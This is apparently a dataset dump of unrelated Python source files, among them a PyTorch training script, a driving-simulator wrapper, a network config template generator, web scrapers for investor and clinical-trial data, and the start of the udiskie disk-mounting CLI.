opt.add_RGB_image_paths:\n opt.n_channel += len(opt.add_RGB_image_paths) * 3\n\nopt.scales = [opt.initial_scale]\nfor i in range(1, opt.n_scales):\n opt.scales.append(opt.scales[-1] * opt.scale_step)\nopt.arch = '{}-{}'.format(opt.model, opt.model_depth)\nprint(opt)\n\nrandom.seed(opt.manual_seed)\ntorch.manual_seed(opt.manual_seed)\nif not opt.no_cuda:\n cudnn.benchmark = True\n cudnn.deterministic = True\n\nmodel, parameters = generate_model(opt)\nprint(model)\ncriterion = nn.CrossEntropyLoss()\nif not opt.no_cuda:\n criterion = criterion.cuda()\n\noptimizer = None\ntrain_loader = None\nval_loader = None\n\n# 画像郡のパスとそのチャンネル数をそれぞれ辞書に登録\npaths = {opt.video_path: '3ch'}\nif opt.add_gray_image_paths:\n for one_ch in opt.add_gray_image_paths:\n paths[one_ch] = '1ch'\nif opt.add_RGB_image_paths:\n for three_ch in opt.add_RGB_image_paths:\n paths[three_ch] = '3ch'\n\nspatial_transform = transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize([0, 0, 0], [1, 1, 1])\n])\ntarget_transform = ClassLabel(True)\ntraining_data = data_set[opt.data_set](\n paths,\n opt.annotation_path,\n 'training',\n spatial_transform=spatial_transform,\n target_transform=target_transform,\n)\ntrain_loader = torch.utils.data.DataLoader(\n training_data,\n batch_size=opt.batch_size,\n shuffle=True,\n num_workers=opt.n_threads,\n pin_memory=True,\n worker_init_fn=worker_init_fn\n)\n\ndampening = 0 if opt.nesterov else opt.dampening\noptimizer = optim.SGD(\n model.parameters(),\n lr=opt.learning_rate,\n momentum=opt.momentum,\n dampening=dampening,\n weight_decay=opt.weight_decay,\n nesterov=opt.nesterov\n)\nspatial_transform = transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize([0, 0, 0], [1, 1, 1])\n])\ntarget_transform = ClassLabel(True)\nvalidation_data = data_set[opt.data_set](\n paths,\n opt.annotation_path,\n 'validation',\n opt.n_val_samples,\n spatial_transform=spatial_transform,\n target_transform=target_transform,\n)\nval_loader = torch.utils.data.DataLoader(\n validation_data,\n batch_size=opt.batch_size,\n shuffle=False,\n num_workers=opt.n_threads,\n pin_memory=True,\n worker_init_fn=worker_init_fn\n)\n\nif opt.show_answer_resume_path:\n print('loading checkpoint {}'.format(opt.show_answer_resume_path))\n checkpoint = torch.load(opt.show_answer_resume_path)\n assert opt.arch == checkpoint['arch']\n\n opt.begin_epoch = checkpoint['epoch']\n model.load_state_dict(checkpoint['state_dict'])\n if not opt.no_train:\n optimizer.load_state_dict(checkpoint['optimizer'])\n optimizer.param_groups[0]['lr'] = opt.learning_rate\n\nwith open(opt.show_answer_result_path, 'w') as f:\n f.write('video_name model_answer true_answer answer subset\\n')\nprint('run')\nshow_answer_epoch(train_loader, model, opt, 'training', device)\nshow_answer_epoch(val_loader, model, opt, 'validation', device)\n","sub_path":"show_answer_main.py","file_name":"show_answer_main.py","file_ext":"py","file_size_in_byte":3598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"87175986","text":"\nimport numpy as np\nimport itertools\nfrom src.commons.py_spaces import Discrete, BoundedContinuous\nfrom bark.models.behavior import DynamicBehaviorModel\nfrom bark.models.dynamic import SingleTrackModel, TripleIntegratorModel\nfrom modules.runtime.commons.parameters import ParameterServer\nfrom src.wrappers.action_wrapper import ActionWrapper\n\nclass DynamicModel(ActionWrapper):\n \"\"\"This module wraps the SingleTrack model\n and requires the steering angle and acceleration\n as system inputs. \n \"\"\"\n def __init__(self,\n model_name=\"SingleTrackModel\",\n params=ParameterServer()):\n ActionWrapper.__init__(self, params)\n self._control_inputs = \\\n self._params[\"ML\"][\"DynamicModel\"][\"action_dimension\",\n \"Dimension of action\",\n 2]\n self._dynamic_model = eval(\"{}(self._params)\".format(model_name))\n self._behavior_models = []\n self._controlled_agents = []\n\n def reset(self, world, agents_to_act):\n \"\"\"see base class\n \"\"\"\n super(DynamicModel, self).reset(world=world,\n agents_to_act=agents_to_act)\n self._behavior_models = []\n self._controlled_agents = agents_to_act\n for agent_id in agents_to_act:\n self._behavior_models.append(DynamicBehaviorModel(self._dynamic_model,\n self._params))\n if agent_id in world.agents:\n actions = np.zeros(shape=(self._control_inputs), dtype=np.float32)\n self._behavior_models[-1].SetLastAction(actions)\n world.agents[agent_id].behavior_model = self._behavior_models[-1]\n else:\n raise ValueError(\"AgentID does not exist in world.\")\n return world\n\n def action_to_behavior(self, world, action):\n \"\"\"see base class\n \"\"\"\n actions = np.reshape(action, (-1, self._control_inputs))\n for i, a in enumerate(actions):\n self._behavior_models[i].SetLastAction(a)\n return world\n\n @property\n def action_space(self):\n \"\"\"see base class\n \"\"\"\n action_num = self._params[\"ML\"][\"DynamicModel\"][\"action_num\",\n \"Lower-bound for actions.\",\n 1]\n lower_bounds = [self._params[\"ML\"][\"DynamicModel\"][\"actions_lower_bound\",\n \"Lower-bound for actions.\",\n [-0.5, -0.01]] for _ in range(action_num)]\n upper_bounds = [self._params[\"ML\"][\"DynamicModel\"][\"actions_upper_bound\",\n \"Upper-bound for actions.\",\n [0.5, 0.01]] for _ in range(action_num)]\n return BoundedContinuous(\n self._control_inputs*action_num,\n low=list(itertools.chain(*lower_bounds)),\n high=list(itertools.chain(*upper_bounds)))","sub_path":"src/wrappers/dynamic_model.py","file_name":"dynamic_model.py","file_ext":"py","file_size_in_byte":2609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"357780780","text":"import re\nimport time\n\n# Stuck these in to make them easier for user input on a GUI\nvpn = 'TBL'\nnum = '213'\nmpls = '4'\ninet = '5'\nhpgw = '213.131.57.185'\nhpfw = '213.131.57.186'\nlan_nw1 = '213.131.57.184'\nisp_ip = '213.131.57.182'\nisp1 = '213.131.57.181'\n\n\nobs_asn_prem = int(num) + 100\nobs_asn = str(65) + str(obs_asn_prem)\n\nreplacement_dict = {\n \"$vpn\": vpn,\n \"$num\": num,\n \"$mpls\": mpls,\n \"$inet\": inet,\n \"$hpgw\": hpgw,\n \"$hpfw\": hpfw,\n \"$lan_nw1\": lan_nw1,\n \"$isp_ip\": isp_ip,\n \"$isp1\": isp1,\n \"$obs_asn\": obs_asn\n}\n\ntext = 'This is a bunch of text! $num $num $vpn $vpn $vpn $vpn $num $num $num'\n\ndef generate_file_name(cfg_file_name):\n file_name = cfg_file_name + \".\" + time.strftime(\"%Y%m%d\") + \".txt\"\n return file_name\n\n\ndef multiple_find_and_replace(dict_replacer,text):\n # Generate a regex object print(regex.pattern) shows the actual regex pattern object attribute\n regex = re.compile(\"(%s)\" % \"|\".join(map(re.escape,dict_replacer.keys())))\n # Replace the text input per the patterns seen in the regex above\n return regex.sub(lambda mo:dict_replacer[mo.string[mo.start():mo.end()]], text)\n\n\ndef open_file_read_and_stripped_returned_list(cfg_template_file):\n f = open(cfg_template_file, 'r')\n config_lines_with_newline_ends = f.readlines()\n f.close()\n config_lines = []\n for line in config_lines_with_newline_ends:\n config_lines.append(line.rstrip())\n return config_lines\n\n\ndef write_new_cnf(new_cnf_list, new_cnf_file):\n filename = new_cnf_file\n try:\n output_file = open(filename, 'w')\n for line in new_cnf_list:\n output_file.write(line + \"\\n\")\n output_file.close()\n return True\n except IOError:\n return False\n\n\nrouter_template_file_name = \"VPN_ROUTER_TEMPLATE.txt\"\nswitch_template_file_name = \"VPN_SWITCH_TEMPLATE.txt\"\n\nrouter_output_file_name = generate_file_name( vpn + 'RVPN1')\nswitch_output_file_name = generate_file_name( vpn + 'SVPN1')\n\nrouter_cfg_template = open_file_read_and_stripped_returned_list(router_template_file_name)\nswitch_cfg_template = open_file_read_and_stripped_returned_list(switch_template_file_name)\n\nnew_router_cnf_file=[]\nnew_switch_cnf_file=[]\n\nfor item in router_cfg_template:\n new_router_cnf_file.append(multiple_find_and_replace(replacement_dict, item))\n\nfor item in switch_cfg_template:\n new_switch_cnf_file.append(multiple_find_and_replace(replacement_dict, item))\n\n#for item in switch_cfg_template:\n# print(multiple_find_and_replace(replacement_dict, item))\n\nprint(new_router_cnf_file)\nprint(new_switch_cnf_file)\n\nwrite_new_cnf(new_router_cnf_file, router_output_file_name)\nwrite_new_cnf(new_switch_cnf_file, switch_output_file_name)\n\n","sub_path":"wanConfigGenerator/wanConfigRegExTestV0.0002_simple.py","file_name":"wanConfigRegExTestV0.0002_simple.py","file_ext":"py","file_size_in_byte":2741,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"150024728","text":"'''\nLOja de Tintas\n'''\n\nm = int(input(\"Area: \"))\n\nif m % 54 != 0:\n latas = int(m / 54)+1\nelse:\n latas = m / 54\n\nvalor = latas * 80\n\nprint(\"%d lata(s) a um custo de %.2f\" %(latas, valor))\n","sub_path":"calculaTinta.py","file_name":"calculaTinta.py","file_ext":"py","file_size_in_byte":193,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"302777993","text":"import lxml.html as web\nimport pandas as pd\nimport requests\nfrom selenium import webdriver\nimport time\n\n\ndef getGuruPortfolios(numOfGurus):\n url = 'https://www.gurufocus.com/guru/portfolio'\n\n html = requests.get(url)\n doc = web.fromstring(html.content)\n all_data = {}\n gurus = doc.xpath('//td[@data-column=\"Guru Name\"]')\n guru_names = []\n\n for i in range(len(gurus) - (40 - numOfGurus)):\n guru_names.append(gurus[i].xpath('.//a[@class=\"guru-router-link\"]/text()')[0][1:])\n browser = webdriver.Chrome('/Users/anay-mac/Downloads/chromedriver')\n browser.get('https://www.gurufocus.com/guru/portfolio')\n\n user = browser.find_elements_by_xpath('//a[@class=\"guru-router-link el-popover__reference\"]')\n user[i].click()\n time.sleep(2)\n user = browser.find_elements_by_xpath('//a[@class=\"guru-menu-item\"]')\n user[1].click()\n time.sleep(2)\n\n names = []\n next = browser.find_element_by_class_name('btn-next')\n length = browser.find_elements_by_class_name('number')\n length = int(length[len(length) - 1].text)\n\n for k in range(length):\n bnames = browser.find_elements_by_xpath('//td[@class=\"table-company_name-info\"]')\n for j in range(len(bnames)):\n names.append([bnames[j].text])\n if browser.find_elements_by_xpath('//table[@class=\"data-table normal-table\"]/tbody[1]/tr[' + str(j) + ']/td[9]/span[1]') != []:\n print(browser.find_elements_by_xpath('//table[@class=\"data-table normal-table\"]/tbody[1]/tr[' + str(j) + ']/td[9]/span[1]')[0].text)\n next.click()\n time.sleep(1)\n\n browser.quit()\n all_data[guru_names[i]] = names\n\n return pd.DataFrame({tic : pd.Series(rev) for tic, rev in all_data.items()})\n\ndef getGuruTop10():\n all_data = {}\n names = []\n browser = webdriver.Chrome('/Users/anay-mac/Downloads/chromedriver')\n browser.get('https://www.gurufocus.com/guru/top-holdings')\n\n next = browser.find_element_by_class_name('btn-next')\n next.click()\n time.sleep(2)\n prev = browser.find_element_by_class_name('btn-prev')\n prev.click()\n time.sleep(2)\n\n for i in range(1, 41):\n names.append(browser.find_elements_by_xpath(\n '//table[@class=\"data-table normal-table\"]/tbody[1]/tr[' + str(i) + ']/td[1]/span[1]')[0])\n temp = []\n for obj in browser.find_elements_by_xpath(\n '//table[@class=\"data-table normal-table\"]/tbody[1]/tr[' + str(i) + ']/td[4]/div')[1:]:\n temp.append(obj.text.split('\\n'))\n all_data[names[i - 1]] = temp\n\n next.click()\n time.sleep(2)\n\n for i in range(1, 28):\n names.append(browser.find_elements_by_xpath(\n '//table[@class=\"data-table normal-table\"]/tbody[1]/tr[' + str(i) + ']/td[1]/span[1]')[0].text)\n temp = []\n for obj in browser.find_elements_by_xpath(\n '//table[@class=\"data-table normal-table\"]/tbody[1]/tr[' + str(i) + ']/td[4]/div')[1:]:\n temp.append(obj.text.split('\\n'))\n all_data[names[40 + (i - 1)]] = temp\n\n browser.quit()\n return pd.DataFrame({tic: pd.Series(rev, dtype='object') for tic, rev in all_data.items()})\n\nprint(getGuruPortfolios(2))","sub_path":"guru_data.py","file_name":"guru_data.py","file_ext":"py","file_size_in_byte":3270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"25156300","text":"import logging\nfrom src.budget import Budget\n\nmodule_logger = logging.getLogger('main.budget_line')\n\nclass Budget_line():\n name = ''\n id = 1\n\n def __init__(self, id = 1, budget_line_name='None', budget_id=None):\n self.id = id\n self.name = budget_line_name\n self.budget_id = budget_id\n self.logger = logging.getLogger( 'main.budget_line.Budget_line' )\n\n\n @property\n def get_id(self):\n return self.id\n\n\n @property\n def get_name(self):\n return self.name\n\n\n @classmethod\n def create_table_budget_line( cls, my_db, table_name ):\n \"\"\"Create new 'budget_line' table\"\"\"\n cls.my_db = my_db\n cls.table_name = table_name\n\n cls.sql = \"CREATE TABLE IF NOT EXISTS {} (`id` int(11) NOT NULL AUTO_INCREMENT,\" \\\n \" `name` varchar(512) NOT NULL, \" \\\n \" `budget_id` int(11) NOT NULL,\" \\\n \" PRIMARY KEY (`id`),\" \\\n \" KEY `budget_id`(`id`)\" \\\n \") ENGINE = InnoDB DEFAULT CHARSET = utf8 COLLATE = utf8_croatian_ci\".format( cls.table_name )\n\n my_db.create_table( cls.sql )\n\n","sub_path":"src/budget_line.py","file_name":"budget_line.py","file_ext":"py","file_size_in_byte":1144,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"305005064","text":"# Licensed under a 3-clause BSD style license - see LICENSE.rst\n# -*- coding: utf-8 -*-\n\nfrom __future__ import absolute_import, division, unicode_literals, print_function\n\nimport numpy as np\n\n\nASDF_MAGIC = b'#ASDF '\nBLOCK_MAGIC = b'\\xd3BLK'\nBLOCK_HEADER_BOILERPLATE_SIZE = 6\n\n# The maximum number of blocks supported\nMAX_BLOCKS = 2 ** 16\nMAX_BLOCKS_DIGITS = int(np.ceil(np.log10(MAX_BLOCKS) + 1))\n\nYAML_TAG_PREFIX = 'tag:yaml.org,2002:'\nYAML_END_MARKER_REGEX = br'\\r?\\n\\.\\.\\.((\\r?\\n)|$)'\n\n\nSTSCI_SCHEMA_URI_BASE = 'http://stsci.edu/schemas/'\n\n\nBLOCK_FLAG_STREAMED = 0x1\n","sub_path":"pyasdf/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"231186362","text":"__author__ = 'puruppathak'\n\nimport csv\nfrom itertools import filterfalse, zip_longest\nimport csv\nfrom random import choice\nimport sys\nimport bs4\nimport lxml\nimport urllib.request\nfrom itertools import islice\nfrom urllib.request import Request, urlopen\nfrom urllib.error import URLError\nimport xml.etree.ElementTree as ET\nimport re\nalist=[]\nalist2=[]\n\nOrgID=[]\nFDAOrg1=[]\nNCTID=[]\nBtitle=[]\nOverallStatus=[]\ncondition=[]\nagency=[]\ngender=[]\nMAge=[]\nPhase1=[]\nAgencyClass=[]\nStudyType=[]\nStudyDesign=[]\nSecID=[]\nFirstRecv=[]\nSDate=[]\nComplDate=[]\nLastChangedDate=[]\nVerificationDate=[]\nFirstRecvResultDate=[]\nPCD=[]\nCountries=[]\nCondition=[]\nIsFDA=[]\nIs801=[]\nIntervention=[]\nacronym=[]\nalist2=[]\nFDAOrg=[]\nRm_Countries=[]\nFirstRecvResultDispoDate=[]\n\n\nlist1 = ['2001']\n#drugname='belsomra'\n\n# Belsomra = ['001','002','003','004','005','006','007','008','009','010','011','012','013','015','016','017','018','020','021','022','023','024','025','026','027','028','029','032','035','036','038','039','040','041','042','055','056']\n\ndrugname = input(\"Enter the Drug name \")\nlist1 = [x.strip(' ') for x in list1]\nlen1 = len(list1)-1\nalist = [];\nstrURL1 = 'https://clinicaltrials.gov/ct2/results?term=%22'\nstrURL2 = '%22+AND+%22'\nstrURL3 = '%22+&Search=Searchdisplayxml=true'\n\nfor indic1 in list1:\n\n\n strURL4 = strURL1 + drugname + strURL2 + indic1 + strURL3\n#req = urllib.request.urlopen('https://clinicaltrials.gov/show/NCT01487096?displayxml=true')\n# https://clinicaltrials.gov/ct2/results?term=%22Aubagio%22+AND+%222000%22+&Search=Searchdisplayxml=true\n\n\n\n try:\n req = urllib.request.urlopen(strURL4)\n xml = bs4.BeautifulSoup(req, 'xml')\n for item in xml.findAll('search_results'):\n y=re.findall('(.*)',str(item))\n len2 = len(y)\n if y:\n alist.append(y)\n l = [indic1] * len2\n FDAOrg1.append(l)\n #FDAOrg.append(indic1)\n else:\n y1=re.findall('[^ ]* (.*)',str(item))\n if y1:\n alist2.append(y1)\n #print (\"NCT IS: \"+item.text)\n #for i in range(0,len1):\n #alist.append(item)\n except URLError as e:\n if hasattr(e, 'reason'):\n print('We failed to reach a server.')\n print('Reason: ', e.reason)\n elif hasattr(e, 'code'):\n print('The server couldn\\'t fulfill the request.')\n print('Error code: ', e.code)\n else:\n\n print(\"Stage 1 processing ...\")\n\n\n\n\nfinal3=sum(FDAOrg1, [])\nfinal2=sum(alist2, [])\n\n\n\nfinal=sum(alist, [])\nprint(final)\nset = set(final)\nresult = list(set)\n\nstrURL11 = 'https://clinicaltrials.gov/show/'\nstrURL21 = '?displayxml=true'\n\nfor indic11 in final:\n strURL31 = strURL11 + indic11 + strURL21\n\n\n try:\n\n\n req2 = urllib.request.urlopen(strURL31)\n xml = bs4.BeautifulSoup(req2, 'xml')\n for item in xml.findAll('id_info'):\n party = item.find('org_study_id')\n if party is None:\n OrgID.append(\"NULL\")\n else:\n NewItem = party.text\n\n #for i in range(0,len1):\n OrgID.append(NewItem)\n for item in xml.findAll('id_info'):\n party = item.find('nct_id')\n if party is None:\n NCTID.append(\"NULL\")\n else:\n NewItem = party.text\n\n #for i in range(0,len1):\n NCTID.append(NewItem)\n\n for item in xml.findAll('clinical_study'):\n party = item.find('brief_title')\n if party is None:\n Btitle.append(\"NULL\")\n else:\n NewItem = party.text\n\n #for i in range(0,len1):\n Btitle.append(NewItem)\n\n\n for item in xml.findAll('clinical_study'):\n party = item.find('overall_status')\n if party is None:\n OverallStatus.append(\"NULL\")\n else:\n NewItem = party.text\n\n #for i in range(0,len1):\n OverallStatus.append(NewItem)\n\n\n for item in xml.findAll('clinical_study'):\n party = item.find('condition')\n if party is None:\n condition.append(\"NULL\")\n else:\n NewItem = party.text\n\n #for i in range(0,len1):\n condition.append(NewItem)\n\n\n for item in xml.findAll('lead_sponsor'):\n party = item.find('agency')\n if party is None:\n agency.append(\"NULL\")\n else:\n NewItem = party.text\n\n #for i in range(0,len1):\n agency.append(NewItem)\n\n\n for item in xml.findAll('eligibility'):\n party = item.find('gender')\n if party is None:\n gender.append(\"NULL\")\n else:\n NewItem = party.text\n\n #for i in range(0,len1):\n gender.append(NewItem)\n\n\n\n\n for item in xml.findAll('eligibility'):\n party = item.find('minimum_age')\n if party is None:\n MAge.append(\"NULL\")\n else:\n NewItem = party.text\n\n #for i in range(0,len1):\n MAge.append(NewItem)\n\n\n\n for item in xml.findAll('clinical_study'):\n party = item.find('phase')\n if party is None:\n Phase1.append(\"NULL\")\n else:\n NewItem = party.text\n\n #for i in range(0,len1):\n Phase1.append(NewItem)\n\n\n\n for item in xml.findAll('lead_sponsor'):\n party = item.find('agency_class')\n if party is None:\n AgencyClass.append(\"NULL\")\n else:\n NewItem = party.text\n\n #for i in range(0,len1):\n AgencyClass.append(NewItem)\n\n\n for item in xml.findAll('clinical_study'):\n party = item.find('study_type')\n if party is None:\n StudyType.append(\"NULL\")\n else:\n NewItem = party.text\n StudyType.append(NewItem)\n\n\n\n\n for item in xml.findAll('clinical_study'):\n party = item.find('study_design')\n if party is None:\n StudyDesign.append(\"NULL\")\n else:\n NewItem = party.text\n StudyDesign.append(NewItem)\n\n\n for item in xml.findAll('id_info'):\n party = item.find('secondary_id')\n if party is None:\n SecID.append(\"NULL\")\n else:\n NewItem = party.text\n\n #for i in range(0,len1):\n SecID.append(NewItem)\n\n\n\n for item in xml.findAll('clinical_study'):\n party = item.find('firstreceived_date')\n if party is None:\n FirstRecv.append(\"NULL\")\n else:\n NewItem = party.text\n\n #for i in range(0,len1):\n FirstRecv.append(NewItem)\n\n for item in xml.findAll('clinical_study'):\n party = item.find('start_date')\n if party is None:\n SDate.append(\"NULL\")\n else:\n NewItem = party.text\n\n #for i in range(0,len1):\n SDate.append(NewItem)\n\n\n for item in xml.findAll('clinical_study'):\n party = item.find('completion_date')\n if party is None:\n ComplDate.append(\"NULL\")\n else:\n NewItem = party.text\n\n #for i in range(0,len1):\n ComplDate.append(NewItem)\n\n\n\n for item in xml.findAll('clinical_study'):\n party = item.find('lastchanged_date')\n if party is None:\n LastChangedDate.append(\"NULL\")\n else:\n NewItem = party.text\n\n #for i in range(0,len1):\n LastChangedDate.append(NewItem)\n\n\n\n for item in xml.findAll('clinical_study'):\n party = item.find('verification_date')\n if party is None:\n VerificationDate.append(\"NULL\")\n else:\n NewItem = party.text\n\n #for i in range(0,len1):\n VerificationDate.append(NewItem)\n\n for item in xml.findAll('clinical_study'):\n party = item.find('firstreceived_results_date')\n if party is None:\n FirstRecvResultDate.append(\"NULL\")\n else:\n NewItem = party.text\n\n #for i in range(0,len1):\n FirstRecvResultDate.append(NewItem)\n\n for item in xml.findAll('clinical_study'):\n party = item.find('firstreceived_results_disposition_date')\n if party is None:\n FirstRecvResultDispoDate.append(\"NULL\")\n else:\n NewItem = party.text\n\n #for i in range(0,len1):\n FirstRecvResultDispoDate.append(NewItem)\n\n\n\n\n for item in xml.findAll('clinical_study'):\n party = item.find('primary_completion_date')\n if party is None:\n PCD.append(\"NULL\")\n else:\n NewItem = party.text\n\n #for i in range(0,len1):\n PCD.append(NewItem)\n\n\n\n for item in xml.findAll('clinical_study'):\n party = item.find('location_countries')\n if party is None:\n Countries.append(\"NULL\")\n else:\n NewItem = party.text\n\n #for i in range(0,len1):\n Countries.append(NewItem)\n\n\n for item in xml.findAll('clinical_study'):\n party = item.find('removed_countries')\n if party is None:\n Rm_Countries.append(\"NULL\")\n else:\n NewItem = party.text\n\n #for i in range(0,len1):\n Rm_Countries.append(NewItem)\n\n\n\n for item in xml.findAll('clinical_study'):\n party = item.find('condition')\n if party is None:\n Condition.append(\"NULL\")\n else:\n NewItem = party.text\n\n #for i in range(0,len1):\n Condition.append(NewItem)\n\n\n\n for item in xml.findAll('clinical_study'):\n party = item.find('is_fda_regulated')\n if party is None:\n IsFDA.append(\"NULL\")\n else:\n NewItem = party.text\n\n #for i in range(0,len1):\n IsFDA.append(NewItem)\n\n for item in xml.findAll('clinical_study'):\n party = item.find('acronym')\n if party is None:\n acronym.append(\"NULL\")\n else:\n NewItem = party.text\n\n #for i in range(0,len1):\n acronym.append(NewItem)\n\n\n\n for item in xml.findAll('clinical_study'):\n party = item.find('is_section_801')\n if party is None:\n Is801.append(\"NULL\")\n else:\n NewItem = party.text\n\n #for i in range(0,len1):\n Is801.append(NewItem)\n\n for item in xml.findAll('clinical_study'):\n y=re.findall('(.*)',str(item))\n if y:\n Intervention.append(y)\n else:\n Intervention.append(\"NULL\")\n\n\n\n except URLError as e:\n if hasattr(e, 'reason'):\n print('We failed to reach a server.')\n print('Reason: ', e.reason)\n elif hasattr(e, 'code'):\n print('The server couldn\\'t fulfill the request.')\n print('Error code: ', e.code)\n else:\n\n\n\n print(\"Stage 2 processing..\")\n\n\n\nprint(FDAOrg)\nf = open('Full_temp_data.csv', 'wt')\ntry:\n writer = csv.writer(f)\n writer.writerow( ('FDA Org ID','Org ID', 'NCT ID','Brief Title','Condition','Overall status','Intervention name','Acronym','Agency','Gender','Minimum Age','Phase','Agency class','Study type','Study Design','Secondary ID','First received','Start Date','Completion date','Last changed date','Verification date','First received result date','Certificate of Delay/ Disposition Date','PCD','Countries','Removed countries','IS FDA regulated','IS section 801'))\n #mylist = list(set(list01))\n #mylist1 = list(set(list02))\n #mylist2 = list(set(list03))\n #for i1 in list11:\n for i1,i2,i3,i4,i5,i6,i7,i8,i9,i10,i11,i12,i13,i14,i15,i16,i17,i18,i19,i20, i21, i22, i23,i24, i25, i26, i27,i28 in zip(final3, OrgID, NCTID, Btitle,Condition, OverallStatus,Intervention, acronym, agency, gender, MAge, Phase1, AgencyClass, StudyType, StudyDesign, SecID, FirstRecv, SDate, ComplDate, LastChangedDate, VerificationDate, FirstRecvResultDate, FirstRecvResultDispoDate, PCD, Countries, Rm_Countries, IsFDA,Is801):\n\n writer.writerow( (i1, i2, i3, i4, i5, i6, i7, i8, i9, i10, i11, i12, i13, i14, i15, i16, i17, i18, i19, i20, i21, i22, i23, i24, i25,i26, i27,i28) )\nfinally:\n f.close()\n\n# Writing faulty ID file:\n\nwith open('Missing.csv', 'w') as f:\n writer = csv.writer(f)\n for val in final2:\n writer.writerow([val])\n\n\n\n\n\nf=open('Full_temp_data.csv', 'rU')\ncsv_f = csv.reader(f)\n\n\n#name1 = input(\"Enter the Org ID \")\n#name2 = input(\"What's another drug name? \")\n#name3 = input(\"What's the sponsor's name?(If nothing, please enter NULL) \")\n#name4 = input(\"Is there any other name for the sponsor(If not, please enter NULL)? \")\n\n\n\n\nallTrials = []\nfirst_stage_cleared = []\nregistered_trials = []\npublished_trials = []\nreported_trials = []\ntimely_reported_trials = []\navailable_trials = []\n\nfor row in csv_f:\n if(row[1] != \"\"):\n allTrials.append(row)\n\n\nprint (\"number of trials analyzed is \" + str(len(allTrials)-1))\n\nfor row in allTrials:\n for indic1 in list1:\n\n if (indic1.lower() in str(row[1]).lower()):\n registered_trials.append(row)\nprint (\"number of valid trials \"+str(len(registered_trials)))\nfor row in registered_trials:\n print (row[1])\n\n\n\n\n\nStage1File = input(\"What would like to name the output file as?(Eg: xyz.csv) \")\n\n\nf = open(Stage1File, 'wt')\ntry:\n writer = csv.writer(f)\n writer.writerow( ('FDA Org ID','Org ID', 'NCT ID','Brief Title','Condition','Overall status','Intervention','Acronym','Agency','Gender','Minimum Age','Phase','Agency class','Study Type','Study Design','Secondary ID','First received','Start Date','Completion date','Last changed date','Verification date','First received result date','Certificate of Delay/ Disposition Date','PCD','Countries','IS FDA regulated','IS section 801'))\n\n for i1 in (registered_trials):\n\n writer.writerow( (i1) )\nfinally:\n f.close()\n\n\n\n\n","sub_path":"ReplAlgoBeta1.py","file_name":"ReplAlgoBeta1.py","file_ext":"py","file_size_in_byte":12830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"476974282","text":"\"\"\"\nUdiskie CLI logic.\n\"\"\"\n__all__ = [\n # entry points:\n 'daemon',\n 'mount',\n 'umount',\n ]\n\nimport warnings\nwarnings.filterwarnings(\"ignore\", \".*could not open display.*\", Warning)\nwarnings.filterwarnings(\"ignore\", \".*g_object_unref.*\", Warning)\n\nimport os\nimport logging\nfrom functools import partial\n\nCONFIG_PATH = 'udiskie/filters.conf'\n\n#----------------------------------------\n# Utility functions\n#----------------------------------------\ndef load_filter(filter_file=None):\n \"\"\"Load mount option filters.\"\"\"\n import udiskie.match\n if not filter_file:\n try:\n from xdg.BaseDirectory import xdg_config_home\n except ImportError:\n xdg_config_home = os.path.expanduser('~/.config')\n filter_file = os.path.join(xdg_config_home, CONFIG_PATH)\n return udiskie.match.FilterMatcher((filter_file,))\n\ndef common_program_options():\n \"\"\"\n Return a command line option parser for options common to all modes.\n \"\"\"\n import optparse\n parser = optparse.OptionParser()\n parser.add_option('-v', '--verbose', action='store_const',\n dest='log_level', default=logging.INFO,\n const=logging.DEBUG, help='verbose output')\n return parser\n\ndef mount_program_options():\n \"\"\"\n Return the mount option parser for the mount command.\n \"\"\"\n parser = common_program_options()\n parser.add_option('-f', '--filters', action='store',\n dest='filters', default=None,\n metavar='FILE', help='filter FILE')\n parser.add_option('-P', '--password-prompt', action='store',\n dest='password_prompt', default='zenity',\n metavar='MODULE', help=\"replace password prompt\")\n return parser\n\ndef connect_udisks(bus):\n \"\"\"\n Return a connection to the first udisks service found available.\n\n TODO: This should check if the udisks service is accessible and if not\n try to connect to udisks2 service.\n\n \"\"\"\n import udiskie.udisks\n return udiskie.udisks.Udisks.create(bus)\n\n\n#----------------------------------------\n# Entry points\n#----------------------------------------\ndef daemon(args=None, udisks=None):\n \"\"\"\n Execute udiskie as a daemon.\n \"\"\"\n import gobject\n import udiskie.automount\n import udiskie.daemon\n import udiskie.mount\n import udiskie.prompt\n\n parser = mount_program_options()\n parser.add_option('-s', '--suppress', action='store_true',\n dest='suppress_notify', default=False,\n help='suppress popup notifications')\n parser.add_option('-t', '--tray', action='store_true',\n dest='tray', default=False,\n help='show tray icon')\n options, posargs = parser.parse_args(args)\n logging.basicConfig(level=options.log_level, format='%(message)s')\n\n # for now: just use the default udisks\n if udisks is None:\n import dbus\n from dbus.mainloop.glib import DBusGMainLoop\n DBusGMainLoop(set_as_default=True)\n bus = dbus.SystemBus()\n udisks = connect_udisks(bus)\n\n # create daemon\n daemon = udiskie.daemon.Daemon(udisks=udisks)\n mainloop = gobject.MainLoop()\n\n # create a mounter\n prompt = udiskie.prompt.password(options.password_prompt)\n filter = load_filter(options.filters)\n mounter = udiskie.mount.Mounter(filter=filter, prompt=prompt, udisks=udisks)\n\n # notifications (optional):\n if not options.suppress_notify:\n import udiskie.notify\n try:\n import notify2 as notify_service\n except ImportError:\n import pynotify as notify_service\n notify_service.init('udiskie.mount')\n notify = udiskie.notify.Notify(notify_service)\n daemon.connect(notify)\n\n # tray icon (optional):\n if options.tray:\n import udiskie.tray\n create_menu = partial(udiskie.tray.create_menu,\n udisks=udisks,\n mounter=mounter,\n actions={'quit': mainloop.quit})\n statusicon = udiskie.tray.create_statusicon()\n connection = udiskie.tray.connect_statusicon(statusicon, create_menu)\n\n # automounter\n automount = 